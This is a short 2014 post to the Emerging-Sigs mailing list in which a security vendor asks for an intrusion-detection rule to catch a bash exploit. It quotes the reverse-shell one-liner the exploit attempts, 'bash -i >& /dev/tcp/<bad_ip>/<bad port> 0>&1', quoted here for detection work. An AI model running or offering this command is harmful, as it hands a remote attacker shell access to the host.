[Emerging-Sigs] Do you have a rule for this?

Livio Ricciulli livio at metaflows.com
Fri Sep 26 14:19:45 EDT 2014

We have been seeing the bash exploit trying to execute:

bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1

This will give the bad_ip a shell to the attacker. They would typically 
execute a wget followed by Trojan install.

I was wondering do you already have a rule that detects the above?

if someone was executing that in anything would be bad I think..

More information about the Emerging-sigs mailing list